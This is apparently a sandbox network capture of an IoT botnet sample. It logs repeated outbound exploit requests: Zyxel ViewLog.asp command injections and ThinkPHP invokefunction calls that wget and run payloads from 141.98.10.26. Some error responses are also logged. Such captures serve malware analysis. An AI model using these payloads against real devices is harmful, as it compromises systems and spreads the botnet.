Nov 22, 2023 08:38:13.390392065 CET	2904	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:13.968604088 CET	2917	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:15.120414019 CET	3046	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.616060019 CET	3396	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:22.223414898 CET	3903	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.438133001 CET	5068	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.147351980 CET	7440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006191969 CET	11907	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.23	35124	31.136.24.49	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.390439034 CET	2904	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:13.968622923 CET	2917	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:15.120419025 CET	3047	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.616055965 CET	3395	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:22.223419905 CET	3903	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.438119888 CET	5068	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.147357941 CET	7440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006182909 CET	11907	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.23	47950	112.173.239.86	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.596998930 CET	2909	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:13.901837111 CET	2915	IN	HTTP/1.0 400 Bad Request Date: Wed, 22 Nov 2023 07:38:12 GMT Server: Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.23	53838	88.221.192.48	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.781060934 CET	2914	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.23	35072	88.119.185.32	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.799640894 CET	2914	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.23	48910	31.136.223.18	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.217840910 CET	2930	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.360099077 CET	3385	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:23.503431082 CET	4082	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.533639908 CET	5568	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.385931969 CET	8726	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:50.530999899 CET	14661	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.23	38418	94.121.146.112	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.262202024 CET	2991	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.23	37424	94.122.67.8	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.262243032 CET	2991	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.23	52864	94.186.184.27	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.400403976 CET	3015	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.583246946 CET	3022	IN	HTTP/1.1 404 Not Found Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io; Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 22 Nov 2023 07:38:14 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.23	42530	31.156.62.131	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.403759003 CET	3016	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.589854002 CET	3023	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:14 GMT Connection: close Content-Length: 334 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.23	58220	94.120.216.27	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.444216013 CET	3017	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.23	43648	95.164.149.62	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.501326084 CET	3020	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.602770090 CET	3025	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.20 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:38:14 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3454 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 